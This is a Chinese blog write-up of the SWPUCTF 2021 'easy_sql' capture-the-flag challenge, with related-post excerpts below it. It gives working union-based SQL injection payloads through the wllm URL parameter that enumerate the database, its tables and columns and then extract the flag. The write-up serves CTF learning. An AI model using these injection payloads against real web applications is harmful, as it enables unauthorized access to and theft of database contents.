[SWPUCTF 2021 新生赛]easy_sql

于 2024-01-27 14:01:38 发布
阅读量317 收藏
点赞数 2
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80481202/article/details/135882051
版权
本文描述了一次SQL注入攻击的详细过程,攻击者利用URL参数进行逐层渗透,从数据库名到表名,再到列名,展示了黑客如何利用技术手段窃取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开题目这里让输入一些东西

在这里URL栏输入参数wllm=1,之后回车

后面进行字段输入?wllm=1 order by 1 -- asd 1,2,3...依次增加直到页面显示查询不到最终发现是三个字段

然后去获取数据库名输入:?wllm=100' union select 1,database(),3 -- asd得到库名为:test_db

下一步获取表名?wllm=100'union select 1, table_name,3 from information_schema.tables where table_schema='test_db' limit 0,1 -- asd

以此获得两个表名test_db和users

下一步获取列名?wllm=100'union select 1, column_name,3 from information_schema.columns where table_schema='test_db'and table_name='test_tb'limit 0,1 -- asd出现flag,下一步获取flag输入:?wllm=100' union select 1,flag,3 from test_tb -- asd提交完成

bae4075
关注
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 1192
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
[NSSCTF]-Web:[SWPUCTF 2021 新生]easy_sql解析
2301_79326813的博客
02-10 1076
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
[SWPUCTF 2021 新生]web 解题思路,实操解析,解题软件,解题方法
09-06
SWPUCTF 2021新生的web项目中,参者遇到了一系列与SQL注入有关的挑战。SQL注入是一种常见的网络安全攻击方式,攻击者通过在Web表单输入或URL查询字符串中输入恶意的SQL代码,可以对数据库执行未授权的操作。...
SWPUCTF 2021 新生 easy_sql
最新发布
03-25
### 关于 SWPUCTF 2021 新生 easy_sql 的解题思路 SQL 注入是一种常见的安全漏洞,攻击者通过向应用程序输入恶意 SQL 查询来获取敏感数据或执行未经授权的操作。对于 SWPUCTF 2021 新生中的 `easy_sql` 题目,...
CTF刷题第一周
qq_62660611的博客
11-10 1977
第一周刷题记录
[SWPUCTF 2021 新生]easy_sql解题记录
2301_80050903的博客
01-25 666
wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段。wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+wllm=1' ,出现报错,说明为字符型漏洞。
[SWPUCTF 2021 新生]easy_sql的WriteUp
2301_76435948的博客
10-22 2489
可以看到有列名为id,flag,说明flag极大可能在这个表中。一道简单的sql注入题,首先查看源代码,看看参数是啥。可知,我们需要用到参数wllm。3可以,4不行,说明字段数为3。先试试test_tb表。用wllm参数试一下。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值